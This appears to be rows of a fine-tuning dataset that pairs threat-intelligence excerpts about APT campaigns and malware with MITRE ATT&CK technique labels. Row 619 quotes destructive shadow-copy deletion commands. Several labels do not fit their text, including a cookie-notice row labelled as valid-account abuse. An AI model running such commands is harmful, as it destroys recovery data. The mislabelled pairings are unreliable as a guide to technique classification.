| 612 | Doki uses a previously undocumented method to contact its operator by abusing the Dogecoin cryptocurrency blockchain in a unique way in order to dynamically generate its C2 domain address. The malware has managed to stay under the radar for over six months despite samples being publicly available in VirusTotal | ['T1102 - Web Service'] | fine_tune |
| 613 | Using job opportunities as template is the known method used by Lazarus to target its victims. The documents created by this actor are well designed and contain a large icon for a known company such as LockHeed Martin, BAE Systems, Boeing and Northrop Grumman in the template. In this campaign the actor has targeted people that are looking for job opportunities at Lockheed Martin. Targeting the defense industry and specifically Lockheed Martin is a known target for this actor | ['T1566.001 - Phishing: Spearphishing Attachment'] | fine_tune |
| 614 | Since this malicious extension is trying to pass for a legitimate Chrome plugin, Grandoreiro’s developer named it “Google Plugin” version 1.5.0. Visually, it adds a square button to the browser window instead of the “cookie” button on the original plugin | ['T1176 - Browser Extensions'] | fine_tune |
| 615 | Before writing a keystroke to the log, the malware obtains the current locale identifier using the ‘GetKeyboardLayout’ API. The retrieved value is checked against several hardcoded paths in which the low DWORD is set to 0x0429 | ['T1614.001 - System Location Discovery: System Language Discovery'] | fine_tune |
| 616 | According to the public source data, these airlines use services of the same IT service provider. To help companies detect and hunt for ColunmTK, we have provided a full list of indicators of compromise (IOCs) that we retrieved. It came to light that the cyberattack on this IT service provider affected 4,500,000 data subjects globally, including data related to Air India's customers. ColunmTK Timeline Connections with APT41 Group-IB researchers believe with moderate confidence that the ColunmTK campaign was carried out by APT41, a prolific Chinese-speaking nation-state threat actor. APT41, also known as WICKED SPIDER (PANDA), Winnti Umbrella, and BARIUM, is believed to have been engaging in state-sponsored espionage in China's interests as well as committing financially motivated cybercrimes. APT41 is known for stealing digital certificates for its cyber espionage operations. The IP address was also used to host the Cobalt Strike framework and shared an SSL certificate, b3038101fd0e8b11c519f739f12c7e9b60234d3b, with ColunmTK's IP address 185[.]118[.]166[.]66. Source: Group-IB Threat Intelligence & Attribution Another interesting domain is service[.]dns22[.]ml. In both cases, the files were used to establish persistence in the network. The files are very similar in the way they launch a DLL file as a service and create keys in the registry | ['T1543.003 - Create or Modify System Process: Windows Service'] | fine_tune |
| 617 | FireEye Intelligence has previously reported that APT33 has ties to destructive malware, and they pose a heightened risk to critical infrastructure. This risk is pronounced in the energy sector, which we consistently observe them target. That targeting aligns with Iranian national priorities for economic growth and competitive advantage, especially relating to petrochemical production | ['T1110.003 - Brute Force: Password Spraying'] | fine_tune |
| 618 | Given Lazarus’ use of a wide array of tools and techniques in their operations, it’s reasonable to assume that the group will continue to use ever-evolving tactics in their malicious activities. Overall, an organization will need multilayered security strategies, as Lazarus and other similar groups are experienced cybercriminals who employ different strategies to get past organizational defenses | ['T1189 - Drive-by Compromise'] | fine_tune |
| 619 | After the wiping procedure, the malware tries to delete the shadow copies by running the following commands: vssadmin.exe delete shadows /all /quiet **and **C:\\Windows\\system32\\wbem\\wmic.exe shadowcopy delete. Finally, the malware enters an infinite loop where it sleeps based on the is_alive_loop_interval value from the configuration file and writes "Meteor is still alive | ['T1047 - Windows Management Instrumentation'] | fine_tune |
| 620 | As can be seen above, the script gathers OS version, a session UID and machine ID, all of which it posts to the server for processing | ['T1082 - System Information Discovery'] | fine_tune |
| 621 | According to the public source data, these airlines use services of the same IT service provider. It came to light that the cyberattack on this IT service provider affected 4,500,000 data subjects globally, including data related to Air India's customers. Compromise of Air India's network In mid-February 2021, Group-IB's Threat Intelligence & Attribution system detected infected devices that were part of Air India's computer network. It took the attackers 24 hours and 5 minutes to spread Cobalt Strike beacons to other devices in the airline's network. ColunmTK Timeline Connections with APT41 Group-IB researchers believe with moderate confidence that the ColunmTK campaign was carried out by APT41, a prolific Chinese-speaking nation-state threat actor. According to Group-IB's Threat Intelligence & Attribution system, the threat actor has been active since at least 2007. APT41 is known for stealing digital certificates for its cyber espionage operations. The IP address was also used to host the Cobalt Strike framework and shared an SSL certificate, b3038101fd0e8b11c519f739f12c7e9b60234d3b, with ColunmTK's IP address 185[.]118[.]166[.]66. The file is very similar to one used by APT41 in a different campaign described by FireEye researchers. The files are very similar in the way they launch a DLL file as a service and create keys in the registry | ['T1569.002 - System Services: Service Execution'] | fine_tune |
| 622 | Additionally, the attackers used a genuine code-signing certificate issued to a Cyprus-based company called Hermetica Digital Ltd | ['T1553.002 - Code Signing'] | fine_tune |
| 623 | We use cookies to personalise content and ads, to provide social media features and to analyse our traffic. We also share information about your use of our site with our social media, advertising and analytics partners who may combine it with other information that you’ve provided to them or that they’ve collected from your use of their services. This is beneficial for the website, in order to make valid reports on the use of their website.Expiry: PersistentType: HTMLrc::cThis cookie is used to distinguish between humans and bots. Expiry: SessionType: HTMLKaspersky Lab2Learn more about this providertest [x2]Used to detect if the visitor has accepted the marketing category in the cookie banner. Expiry: SessionType: HTTPMarketo2Learn more about this provider__cf_bmThis cookie is used to distinguish between humans and bots. Expiry: 2 yearsType: HTTP25 Marketing cookies are used to track visitors across websites. This can be used for marketing purposes. This is used in context with the email marketing service Marketo.com, which allows the website to target visitors via email | ['T1078 - Valid Accounts'] | fine_tune |
| 624 | Use automated methods, such as scripts, for collecting data (Automated Collection [T1119]) - Capture user input to obtain credentials and collect information (Input Capture [T1056]) - Collect local systems data from a compromised system (Data from Local System [T1005]) - Take screen captures of the desktop (Screen Capture [T1113]) - Collect data stored in the Windows clipboard from users (Clipboard Data [T1115 | ['T1005 - Data from Local System'] | fine_tune |
| 625 | A service DLL (loaded by svchost.exe) with a ServiceMain function typically named NetSetupServiceMain - A standard non-Service DLL loaded by rundll32.exe | ['T1558.003 - Steal or Forge Kerberos Tickets: Kerberoasting'] | fine_tune |
| 626 | OSX/Keydnap uses a Tor2Web proxy for command and control. An installed launch agent, icloudproc, is automatically started by the OS, and listens on 127.0.0.1:9050. As noted by ESET, the main backdoor component (icloudsyncd) uses this proxy for communication purposes: “Keydnap is using the onion.to Tor2Web proxy over HTTPS to report back to its C&C server | ['T1543.001 - Create or Modify System Process: Launch Agent'] | fine_tune |
| 627 | Communication over DNS tunnel with a hardcoded domain name and DGA-generated subdomain - C2 traffic encrypted with RSA-2048 - Custom AES-encrypted storage format used to store configuration, plugins, and harvested data - Unique version number for each sample | ['T1071.004 - Application Layer Protocol: DNS', 'T1027 - Obfuscated Files or Information'] | fine_tune |
| 628 | Volexity is seeing active in-the-wild exploitation of multiple Microsoft Exchange vulnerabilities used to steal e-mail and compromise networks. In January 2021, through its Network Security Monitoring service, Volexity detected anomalous activity from two of its customers' Microsoft Exchange servers. This vulnerability is remotely exploitable and does not require authentication of any kind, nor does it require any special knowledge or access to a target environment. Additionally, Volexity is providing alternative mitigations that may be used by defenders to assist in securing their Microsoft Exchange instances. This vulnerability has been confirmed to exist within the latest version of Exchange 2016 on a fully patched Windows Server 2016 server. Volexity also confirmed the vulnerability exists in Exchange 2019 but has not tested against a fully patched version, although it believes they are vulnerable. There are two methods to download e-mail with this vulnerability, depending on the way that Microsoft Exchange has been configured. In the case where a single server is being used to provide the Exchange service, Volexity believes the attacker must know the targeted user’s domain security identifier (SID) in order to access their mailbox. Further other notable User-Agent entries tied to tools used for post-exploitation access to webshells. Network Indicators - Attacker IPs . Volexity has observed numerous IP addresses leveraged by the attackers to exploit the vulnerabilities described in this blog | ['T1190 - Exploit Public-Facing Application'] | fine_tune |
| 629 | The analyzed sample of NotPetya encrypts the compromised system’s files with a 128-bit Advanced Encryption Standard (AES) algorithm during runtime. The malware then writes a text file on the “C:\” drive that includes a static Bitcoin wallet location as well as unique personal installation key intended for the victim to use when making the ransom payment and the user’s Bitcoin wallet ID. NotPetya modifies the master boot record (MBR) to enable encryption of the master file table (MFT) and the original MBR, and then reboots the system. Based on the encryption methods used, it appears unlikely that the files could be restored, even if the attacker received the victim’s unique key and Bitcoin wallet ID | ['T1486 - Data Encrypted for Impact'] | fine_tune |
| 630 | The campaigns use a TrickBot downloader that is signed and uses an icon to pretend it is a Microsoft Word document. When the user double-clicks the file, they are presented with a decoy message box. To avoid suspicion, the decoy message suggests the user should update Microsoft Word or open the file from another computer | ['T1555.003 - Credentials from Password Stores: Credentials from Web Browsers'] | fine_tune |
| 631 | To achieve privilege escalation within the environment, FIN6 utilized a named pipe impersonation technique included within the Metasploit framework that allows for SYSTEM-level privilege escalation | ['T1134 - Access Token Manipulation'] | fine_tune |
| 632 | It then calls the API EnumWindows() function to enumerate all windows from the victim’s system. Its EnumFunc() callback function collects all windows titles and then adds a 14H long random string prefix. One mixed windows title looks like this: “{14H long random string}+windows title”. All the mixed windows titles are added into a string list box control | ['T1010 - Application Window Discovery'] | fine_tune |
| 633 | As my analysis in the previous blog showed, Agent Tesla is a spyware. It monitors and collects the victim’s keyboard inputs, system clipboard, screen shots of the victim’s screen, as well as collects credentials of a variety of installed software. So far, through my quick analysis, this version is similar to the older one | ['T1082 - System Information Discovery'] | fine_tune |
| 634 | We’ve seen the adversary staging data on a remote system or on the local system. Most of the times the data is compressed and copied at the same time. Only a handful of times the adversary copies the data first before compressing (archive collected data) and exfiltrating it. The adversary compresses and encrypts the data by using WinRAR from the command-line | ['T1124 - System Time Discovery'] | fine_tune |
| 635 | A macro in the Microsoft Word document contained the malicious code designed to download and execute additional malicious software on the infected system | ['T1566.001 - Phishing: Spearphishing Attachment', 'T1566.001 - Phishing: Spearphishing Attachment'] | fine_tune |
| 636 | PACT has reverse engineered the DGA, dynamically analyzed the malware, investigated the Threat Actor’s (TA) web-based infrastructure, and consolidated the results of our analysis into the following report | ['T1070.004 - Indicator Removal on Host: File Deletion'] | fine_tune |
| 637 | From September to December 2018 the RTM group sent out more than 11,000 malicious emails. The cybercriminals, however, are not going to stop there, as evidenced by the new malicious campaigns that we track as part of our ongoing threat intelligence activities. Where do we begin our search. Let's start with simple things: we will take the NTUSER.DAT registry file with the latest modification date from the user directory (C:\Users\%username%\), and extract data from it using RegRipper. In general, you do not have to stick to the Sleuth Kit at all; there are more convenient tools like FTK Imager, a free tool, which can be used not only to create forensic images, but also to examine their contents. Let's take a closer look at apg.exe and use PPEE: This looks like TeamViewer and is signed as TeamViewer, so does this mean it indeed is TeamViewer. Judging by the file's size, it has nothing to do with the original msi.dll, so it is clearly DLL Search Order Hijacking. The operating system starts searching for the necessary libraries from the current directory, which means that instead of the legitimate msi.dll, the one located in b7mg81 will be loaded. Another interesting file is TeamViewer.ini: Here is anti-forensics: according to the configuration file, our "TeamViewer" did not keep any logs, and was apparently used as a RAT (Remote Access Trojan). Well, not bad. I think what we can use the Sleuth Kit again | ['T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking'] | fine_tune |
| 638 | The attackers orchestrate attacks using batch or PowerShell scripts that are executed, with the help of domain controllers, on any machine the DC can reach. The scripts retrieve the attackers’ payloads using psexec or certutil | ['T1105 - Ingress Tool Transfer', 'T1569.002 - System Services: Service Execution', 'T1059.003 - Command and Scripting Interpreter: Windows Command Shell'] | fine_tune |
| 639 | Note that the browser itself is not hooked. Executing the browser from any other Chrome shortcut link will start and run it normally without the malicious extension, canceling out the malware’s ability to control what the victim does | ['T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification'] | fine_tune |
| 640 | The Epic backdoors are commanded by a huge network of hacked servers that deliver command and control functionality | ['T1049 - System Network Connections Discovery'] | fine_tune |
| 641 | Capture current screen (screenshot) and save screenshot as a JPEG to "C:\ProgramData\tsc". The contents of the file are subsequently read and sent to the C2. Code to capture a screenshot as bitmap and save to file | ['T1113 - Screen Capture'] | fine_tune |
| 642 | Sodinokibi attempts to encrypt data in a user's directory and delete shadow copy backups to make data recovery more difficult. This vulnerability is easy for attackers to exploit, as anyone with HTTP access to the WebLogic server could carry out an attack. Attackers have been making use of this exploit in the wild since at least April 17. Initial stages of the ransomware attack occurred on April 25, the day before Oracle released their update. The attackers are downloading the Sodinokibi ransomware. In this case, the attackers simply leveraged the Oracle WebLogic vulnerability, causing the affected server to download a copy of the ransomware from attacker-controlled IP addresses 188.166.74[.]218 and 45.55.211[.]79. The 188.166.74[.]218 IP address is also home to a pair of other malicious domains unrelated to this ransomware attack: arg0s-co[.]uk, which is likely a phishing domain, and projectstore[.]guru, a domain with bogus PDF-related Google search results. The other IP, 45.55.211[.]79, hosts a pair of legitimate Chilean domains, and appears to have been infected and repurposed by the attackers. The attackers were ultimately successful at encrypting a number of systems during this incident. Cisco IR Services and Talos observed the attack requests originating from 130.61.54[.]136 | ['T1105 - Ingress Tool Transfer'] | fine_tune |
| 643 | Exploits a kernel privilege escalation vulnerability to gain SYSTEM privileges using CVE-2018-8453. REvil uses Hypertext Transfer Protocol Secure (HTTPS) for communication with its controllers | ['T1071.001 - Application Layer Protocol: Web Protocols'] | fine_tune |
| 644 | The attackers dropped Visual Basic and PowerShell scripts in folders that they created under the ProgramData (a hidden folder, by default). The attackers created persistence using Windows’ registry, services and scheduled tasks. This persistence mechanism ensured that the loader scripts would execute either at startup or at predetermined intervals | ['T1053.005 - Scheduled Task/Job: Scheduled Task', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'] | fine_tune |
| 645 | ESET researchers have discovered several previously undocumented post-compromise tools used by the highly active Gamaredon threat group in various malicious campaigns. One tool, a VBA macro targeting Microsoft Outlook, uses the target’s email account to send spearphishing emails to contacts in the victim’s Microsoft Office address book. We also analyzed further Gamaredon tools that have the ability to inject malicious macros and remote templates into existing Office documents | ['T1039 - Data from Network Shared Drive', 'T1204.002 - User Execution: Malicious File', 'T1534 - Internal Spearphishing', 'T1083 - File and Directory Discovery'] | fine_tune |
| 646 | We have identified several implants that leveraged PowerShell, VBS, JS, and dotnet for resilience and persistence. The final stage, however, is a dotnet application that takes several commands such as directory listing, screenshot, compress, upload, etc. It then creates random long string folder names in temp directories to host the collected files per category before compressing, encrypting and uploading to the C2 server | ['T1083 - File and Directory Discovery'] | fine_tune |
| 647 | Initially, cybercriminals used BlackEnergy custom plugins for launching DDoS attacks. BlackEnergy2 was eventually seen downloading more crimeware plugins – a custom spam plugin and a banking information stealer custom plugin. While another crimeware group continues to use BlackEnergy to launch DDoS attacks, the BE2 APT appears to have used this tool exclusively throughout 2014 at victim sites and included custom plugins and scripts of their own. To be clear, our name for this actor has been the BE2 APT, while it has been called “Sandworm Team” also | ['T1082 - System Information Discovery'] | fine_tune |
| 648 | dellLemb||> deletes the registry key \Software\Microsoft\Internet Explorer\notes. EXECPROGAM calls ShellExecute to run the application given in the command. NOVOLEMBRETE creates and stores data sent with the command in the registry key \Software\Microsoft\Internet Explorer\notes | ['T1070 - Indicator Removal on Host'] | fine_tune |
| 649 | Check for Skype connectivity - Download and install Skype - Encoded communication with its C2 - Execute commands sent from the C2 server - Get multifactor authentication settings - Get the currently logged on user and OS version | ['T1132.001 - Data Encoding: Standard Encoding'] | fine_tune |
| 650 | The fourth-stage wiper starts off by enumerating from A to Z, looking for fixed and remote logical drives in the system. Enumerates logical drives. For each enumeration, it performs a breadth-first search to wipe the files in the logical drive while ignoring files located in the "%HOMEDRIVE%\Windows" directory | ['T1049 - System Network Connections Discovery', 'T1082 - System Information Discovery'] | fine_tune |
| 651 | 1) The infection chain used in this attack begins with a weaponized link to a Google Drive folder, obfuscated using the goo.gl link shortening service. 2) When contacted, the Google Drive link retrieves a zip file, which contains a .lnk file obfuscated as a .pdf file using the double extension trick. 3) This file requires the target to attempt to open the .lnk file, which redirects the user to a Windows Scripting Component (.wsc) file, hosted on an adversary-controlled microblogging page. MUSTANG PANDA has previously used the observed microblogging site to host malicious PowerShell scripts and Microsoft Office documents in targeted attacks on Mongolia-focused NGOs. 4) The .lnk file uses an embedded VBScript component to retrieve a decoy PDF file and a PowerShell script from the adversary-controlled web page. 6) The Cobalt Strike Beacon implant beacons to the command-and-control (C2) IP address, which is used to remotely control the implant | ['T1036.007 - Masquerading: Double File Extension'] | fine_tune |
| 652 | WMIC (wmic.exe) was used to create a remote command prompt instance (cmd.exe), which then executed the PowerShell code. The PowerShell command created two variables and attempted to download and execute the payload from one of FIN8’s Command and Control (C&C) servers. This download was blocked by Bitdefender – below description is based on interpretation of variables discovered in our previous analysis of FIN8 operations | ['T1059.001 - Command and Scripting Interpreter: PowerShell', 'T1105 - Ingress Tool Transfer', 'T1059.003 - Command and Scripting Interpreter: Windows Command Shell'] | fine_tune |
| 653 | mshlpweb.dll is a loader that uses a known token impersonation technique to elevate permissions and execute install.bat with high privileges. This process runs as a high-integrity process by default, since its set to auto-elevate within its manifest | ['T1134.002 - Create Process with Token'] | fine_tune |
| 654 | After downloading the executable payload, the secondary VBScript runs the following command on the command line (T1059) to kill any existing msiexec.exe process instances and use the ping application to sleep for two seconds before using the legitimate msiexec.exe application (T1218) to launch the downloaded PlayerVLC.msi file | ['T1105 - Ingress Tool Transfer'] | fine_tune |
| 655 | In all stages of the attack, the actor demonstrated a deep knowledge of software tools, deployments, security software and systems common in networks, and techniques frequently used by incident response teams. This knowledge is reflected in the actor’s operational decisions, from the choice of command-and-control (C2) infrastructure to the naming of scheduled tasks used to maintain persistence | ['T1053.005 - Scheduled Task/Job: Scheduled Task'] | fine_tune |
| 656 | Once elevated, the ransomware will write a copy of a random file from System32 to the %APPDATA% directory. The newly copied file will have a random and hidden filename. This process allows for the ransomware to copy itself into the file by way of an alternate data stream (ADS | ['T1564.004 - Hide Artifacts: NTFS File Attributes'] | fine_tune |
| 657 | The Trojan sends an email to sahro.bella7[at]post.cz with sysscr.ops as the attachment, the string SCreen within the body and a subject with the unique system identifier via SMTPS from one of three previously used accounts. If the actor wishes to download an additional payload to the compromised host, they will respond by sending emails in the following steps. 3) The actor sends an email to trala.cosh2[at]post.cz with the unique system identifier as a subject with a secondary email account and credentials in ASCII hexadecimal format within the message body. This secondary email account is unknown at this time, so we will refer to it as "secondary email account" in future steps. 4) The actor sends an email to the secondary email account with the unique system identifier as a subject with a secondary payload attached with a filename of txt. Cannon opens the email with the correct subject and decodes the hexadecimal data in the body of the message to obtain the secondary email account. 7) The actor sends an email to trala.cosh2[at]post.cz with the unique system identifier as a subject with a file path that the Cannon Trojan will use to save the secondary payload. 8) Cannon logs into the secondary email account via POP3S looking for emails with a subject that matches the unique system identifier. Cannon opens the email with the correct subject and decodes the hexadecimal data in the body of the message to obtain the file path that it will use to move the downloaded auddevc.txt file. 12) Cannon moves the downloaded file to the specified path | ['T1105 - Ingress Tool Transfer'] | fine_tune |
| 658 | Another relationship we have mentioned repeatedly is the use of the SYSCON malware family. This particular malware family was first reported in October 2017 and has been observed delivering decoy documents pertaining to North Korea. The malware is generally unsophisticated, making use of remote FTP servers for C2 communication | ['T1071.002 - File Transfer Protocols'] | fine_tune |
| 659 | It also conducts basic victim profiling activity, collecting the computer name, running process IDs, %TEMP% directory path and version of Internet Explorer. It communicates encoded system information to a single hard coded command and control (C2) server, using the system’s default User-Agent string. BUGJUICE is a backdoor that is executed by launching a benign file and then hijacking the search order to load a malicious dll into it. BUGJUICE defaults to TCP using a custom binary protocol to communicate with the C2, but can also use HTTP and HTTPs if directed by the C2. It has the capability to find files, enumerate drives, exfiltrate data, take screenshots and provide a reverse shell. SNUGRIDE is a backdoor that communicates with its C2 server through HTTP requests | ['T1071.001 - Application Layer Protocol: Web Protocols'] | fine_tune |
| 660 | This backdoor adds the following registry entries to enable its automatic execution at every system startup | ['T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'] | fine_tune |
| 661 | Cisco Talos has discovered a new malware campaign based on a previously unknown family we're calling "PoetRAT. The droppers are Microsoft Word documents that deploy a Python-based remote access trojan (RAT). We named this malware PoetRAT due to the various references to William Shakespeare, an English poet and playwright. The RAT has all the standard features of this kind of malware, providing full control of the compromised system to the operation. For exfiltration, it uses FTP, which denotes an intention to transfer large amounts of data. The campaign shows us that the operators manually pushed additional tools when they needed them on the compromised systems. We will describe a couple of these tools. The most interesting is a tool used to monitor the hard disk and exfiltrate data automatically | ['T1056.001 - Input Capture: Keylogging'] | fine_tune |
| 662 | The batch-files appear to be used to load the Cobalt Strike beacon, but also to perform discovery commands on the compromised system | ['T1059.003 - Command and Scripting Interpreter: Windows Command Shell'] | fine_tune |
| 663 | The actor has distributed its dropper embedded in an archive file (외교부 가판 2021-05-07.zip) as an attachment through spearphishing emails. The archive file contains a JavaScript file (외교부 가판 2021-05-07.pdf.jse) which pretends to be a PDF file that contains two Base64 encoded blobs. The first one is the content of the decoy PDF file in Base64 format and the other one contains the AppleSeed payload also in Base64 format (encoded twice | ['T1204.002 - User Execution: Malicious File', 'T1027 - Obfuscated Files or Information'] | fine_tune |
| 664 | The Daum variants of Brave Prince gather information from the system and save it to the file PI_00.dat. The type of data this implant gathers from the victim’s system | ['T1016 - System Network Configuration Discovery', 'T1012 - Query Registry'] | fine_tune |
| 665 | Collected files under the preliminary collection directory will be compressed using a WinRAR instance that the Ramsay Installer drops. This compressed archive will be saved within the preliminary collection directory and then generate a Ramsay container artifact | ['T1083 - File and Directory Discovery', 'T1560.001 - Archive Collected Data: Archive via Utility'] | fine_tune |
| 666 | As discussed in the delivery document analysis above, depending on the OS architecture either of the embedded KerrDown DLLs will be dropped in the victim machine. The DLL is dropped in the directory location ‘Users\Administrator\AppData\Roaming\’ as ‘main_background.png’. The DLL retrieves the payload from the URL, decrypts it by using DES algorithm and execute it in the memory. Therefore, it is observed that only the KerrDown DLL downloader is saved in the system and the payload directly gets executed in the memory without being written in the system. Table 1 shows the URL the downloader will attempt to download the payload from depending on the OS architecture of the victim machine | ['T1105 - Ingress Tool Transfer'] | fine_tune |
| 667 | To exploit the Log4j vulnerability (CVE-2021-44228), the attackers chose one of the publicly available open-source JNDI Exploit Kits, since removed from GitHub due to its enormous popularity following the vulnerability emergence. There are multiple analysis papers that explain how the vulnerability can be exploited, so we will skip the details of the actual exploitation step | ['T1190 - Exploit Public-Facing Application'] | fine_tune |
| 668 | List of installed antivirus products - OS version - Username - Computer name - Whether any of the following software is installed: Diebold Warsaw GAS Tecnologia (an application to protect access to online banking) Trusteer Several Latin American banking applications - Diebold Warsaw GAS Tecnologia (an application to protect access to online banking) - Trusteer - Several Latin American banking applications | ['T1518.001 - Software Discovery: Security Software Discovery'] | fine_tune |
| 669 | All further information sent to the C&C is encrypted with a public key framework, making decryption impossible. The commands from the C&C are encrypted in a simpler manner and can be decrypted if intercepted because the secret key is hardcoded in the malware | ['T1573.001 - Symmetric Cryptography'] | fine_tune |
| 670 | HELLOKITTY is written in C++, but reimplements a significant portion of DEATHRANSOM's functionality using similar loop operations and thread pooling via QueueUserWorkItem. The code structure to enumerate network resources, logical drives, and perform file encryption is very similar. Additionally, HELLOKITTY and DEATHRANSOM share very similar functions to check for the completion status of their encryption threads before exiting | ['T1082 - System Information Discovery', 'T1135 - Network Share Discovery'] | fine_tune |
| 671 | In our tests, running Valak from a U.S. location on a vulnerable Windows 10 host returned a banking Trojan called IcedID as the follow-up malware. In one case, we saw both IcedID and NetSupport Manager RAT-based malware delivered as follow-up malware on a Windows 7 host from June 2020 | ['T1105 - Ingress Tool Transfer'] | fine_tune |
| 672 | AIRBREAK: a JavaScript-based backdoor also reported as “Orz” that retrieves commands from hidden strings in compromised webpages and actor controlled profiles on legitimate services. BADFLICK: a backdoor that is capable of modifying the file system, generating a reverse shell, and modifying its command and control (C2) configuration. HOMEFRY: a 64-bit Windows password dumper/cracker that has previously been used in conjunction with AIRBREAK and BADFLICK backdoors. The malware accepts up to two arguments at the command line: one to display cleartext credentials for each login session, and a second to display cleartext credentials, NTLM hashes, and malware version for each login session. MURKYTOP: a command-line reconnaissance tool | ['T1018 - Remote System Discovery', 'T1135 - Network Share Discovery', 'T1046 - Network Service Discovery', 'T1087.001 - Account Discovery: Local Account'] | fine_tune |
| 673 | Use of obfuscated shellcode executed via PowerShell to download a "reverse_tcp" payload from Metasploit onto victim systems | ['T1059.001 - Command and Scripting Interpreter: PowerShell'] | fine_tune |
| 674 | At the time of writing, two VBS files have been seen pushed to the target computer by VBShower | ['T1105 - Ingress Tool Transfer'] | fine_tune |
| 675 | Another difference in the network traffic generated from the malware is that the encoded proxy information has been added in the URL query values during the C2 communication. Table 4 shows the parameters sent to C2 server from the backdoor in the newer versions | ['T1090.002 - External Proxy'] | fine_tune |
| 676 | Filename: impku.dat:schemas File size: 608854 bytes MD5 hash: b774f39d31c32da0f6a5fb5d0e6d2892 SHA1 hash: ae3ff39c2a7266132e0af016a48b97d565463d90 Notes: Alternate data stream (ADS) PNG file with the PowerDuke backdoor component hidden and encrypted within using Tiny Encryption Algorithm (TEA | ['T1564.004 - Hide Artifacts: NTFS File Attributes'] | fine_tune |
| 677 | After the victim clicks the Enable Content button, the macro commands are executed and invoke the Windows OS process msiexec.exe. This process is the Windows Installer, a software component and application programming interface of Microsoft Windows used for the installation, maintenance, and removal of software | ['T1218.007 - Signed Binary Proxy Execution: Msiexec'] | fine_tune |
| 678 | This turned out to be the best solution, as the Cobalt group set up a controlled botnet in the bank's network which was very difficult to track and even harder to stop. In october 2016 Group-IB published the report about the Cobalt group. Network penetration In all cases investigated by Group-IB, the Cobalt group used a set of spear phishing emails to gain initial access to the corporate infrastructure. For organizations that perform timely updates of their systems and adhere to strict security policies, the Cobalt group employs another method to deliver malicious code through emails with Word documents containing a malicious macro. Provision of the malware survivability The Cobalt group uses different methods to ensure malware survivability on corporate networks. Aside from that, startup is performed by loading Cobalt Strike into the main memory without saving to the file system. Bypassing network security Cobalt Strike allows users to install two types of modules: HTTP/HTTPS/DNS modules and SMB modules. Use of standard tools Cobalt Strike is publicly accessible, and can be downloaded in order to learn and create detection rules on the network. To prevent this threat, the company should configure filter rules to detect the above-mentioned tools on the corporate network. Conclusion After infecting one computer on an organization's network, the Cobalt group analyzes the programs used on it and search for critical servers and the computers from which they are accessed | ['T1046 - Network Service Discovery'] | fine_tune |
| 679 | Initially, cybercriminals used BlackEnergy custom plugins for launching DDoS attacks. While another crimeware group continues to use BlackEnergy to launch DDoS attacks, the BE2 APT appears to have used this tool exclusively throughout 2014 at victim sites and included custom plugins and scripts of their own. To be clear, our name for this actor has been the BE2 APT, while it has been called “Sandworm Team” also | ['T1555.003 - Credentials from Password Stores: Credentials from Web Browsers'] | fine_tune |
| 680 | All of the bait documents are MHTML ones with malicious macro embedded and the .doc suffix to bypass detection. Below is an example of bait document captured by 360 Threat Intelligence Center in February 2019 | ['T1059.005 - Command and Scripting Interpreter: Visual Basic'] | fine_tune |
| 681 | 2) The additional commands and execution objects are executed in the machine that has been compromised in the isolated network | ['T1204.002 - User Execution: Malicious File'] | fine_tune |
| 682 | Beacon: a backdoor that is commercially available as part of the Cobalt Strike software platform, commonly used for pen-testing network environments. The malware supports several capabilities, such as injecting and executing arbitrary code, uploading and downloading files, and executing shell commands. BLACKCOFFEE: a backdoor that obfuscates its communications as normal traffic to legitimate websites such as Github and Microsoft's Technet portal. Used by APT17 and other Chinese cyber espionage operators | ['T1102.001 - Dead Drop Resolver'] | fine_tune |
| 683 | Sibot is a dual-purpose malware implemented in VBScript. It is designed to achieve persistence on the infected machine then download and execute a payload from a remote C2 server. The VBScript is then run via a scheduled task | ['T1053.005 - Scheduled Task/Job: Scheduled Task'] | fine_tune |
| 684 | The initial infection vector of this campaign is a Microsoft Office Excel Worksheet with an Office macro that uses the mshta.exe Windows executable to run scripts, which are embedded in the HTML of a specially-crafted blogspot.com page. The page, 29[.]html, contains two distinct sections of scripts. The scripts create scheduled tasks and also retrieve, decode, and execute a copy of Revenge RAT | ['T1218.005 - Signed Binary Proxy Execution: Mshta'] | fine_tune |
| 685 | BRONZE UNION has also leveraged various web shells to collect and stage data for exfiltration. In one instance, the threat actor gained remote access to a high-value system in a compromised network, ran quser.exe to identify existing RDP sessions on the device, immediately ran a command to compile a RAR archive that specified file types the threat actor did not want, and used a password to encrypt the archive | ['T1560.002 - Archive Collected Data: Archive via Library', 'T1074.001 - Data Staged: Local Data Staging', 'T1049 - System Network Connections Discovery'] | fine_tune |
| 686 | The loaded DLL retrieves the path to the Warzone malicious file from HKCU\SOFTWARE\_rptls\Install, iterates through running processes and kills the Warzone process if it already exists. Then it runs the Warzone executable again, this time with Admin privileges | ['T1055 - Process Injection'] | fine_tune |
| 687 | KillDisk has a numeric parameter that denotes the number of minutes (15 being the default) it will wait before it shuts down the affected machine. To try to reboot the machine, it will try to terminate these processes | ['T1489 - Service Stop'] | fine_tune |
| 688 | The backdoor determines its C2 server using a Domain Generation Algorithm (DGA) to construct and resolve a subdomain of avsvmcloud[.]com. The Update method is responsible for initializing cryptographic helpers for the generation of these random C2 subdomains. Subdomains are generated by concatenating a victim userId with a reversible encoding of the victims local machine domain name. The attacker likely utilizes the DGA subdomain to vary the DNS response to victims as a means to control the targeting of the malware. These subdomains are concatenated with one of the following to create the hostname to resolve | ['T1568 - Dynamic Resolution'] | fine_tune |
| 689 | Appendix A – PLAINTEE older variant Older variants of PLAINTEE can be identified via the unique mutex created during runtime. At least three variants of PLAINTEE have been identified to date, however, the following two samples have additional unique differences | ['T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control'] | fine_tune |
| 690 | The fourth spear phishing email of the campaign was sent on January 23, 2018 to a range of targets working for Tibetan NGOs, media groups, and the CTA. The message appeared to be sent from the Director of the Tibet Museum, which is an official museum of the CTA. Attached to the email were RTF and PPSX messages that claimed to present information about the National Museum of Tibet (see Figure 5). These files contained the CVE-2017-11882 and TSSL Suite infection chain | ['T1566.001 - Phishing: Spearphishing Attachment'] | fine_tune |
